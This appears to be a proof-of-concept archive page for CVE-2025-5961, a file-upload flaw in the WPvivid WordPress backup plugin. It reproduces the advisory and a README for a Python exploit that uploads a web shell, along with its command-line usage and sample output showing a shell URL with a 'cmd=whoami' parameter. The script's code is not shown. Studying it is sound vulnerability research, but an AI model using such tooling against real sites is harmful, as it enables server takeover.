Associated Vulnerability
Title:Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload (CVE-2025-5961)Description:The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.
Description
Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload
Readme
# 🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload
> 📈 *This vulnerability affects a plugin with over **700,000+ installs***
---
## 📝 CVE Details
- **CVE:** CVE-2025-5961
- **CVSS:** 7.2 (High)
- **Published:** July 3, 2025
---
## 🔍 Description
The **Migration, Backup, Staging – WPvivid Backup & Migration** plugin for WordPress is vulnerable to **arbitrary file uploads** due to missing file type validation in the `wpvivid_upload_import_files` function in all versions up to, and including, `0.9.116`.
This allows **authenticated attackers (Administrator-level and above)** to upload arbitrary files to the server, potentially enabling remote code execution.
---
## 🧰 Script
This repository contains an exploit script for **CVE-2025-5961**, written in Python, which:
- Checks plugin version.
- Logs in as Administrator.
- Extracts the required nonce from the plugin page.
- Uploads a web shell payload.
- Prints the URL to access the shell.
---
## 🖥️ Example Usage
```bash
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
```
---
## ⚙️ Usage
```text
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
```
---
## 📊 Output Example
```text
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
```
---
## ⚖️ Disclaimer
This script is provided for **educational and research purposes only**.
The author is not responsible for any misuse or damage caused by this tool.
---
## ✍️ By
**Khaled Alenazi (Nxploited)**
🌐 [GitHub](https://github.com/Nxploited/)
---
File Snapshot
[4.0K] /data/pocs/446db3a8f55426a0861b02d12cf80a51caba1abf
├── [3.5K] CVE-2025-5961.py
├── [1.1K] LICENSE
├── [2.3K] README.md
└── [ 9] requirements.txt
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →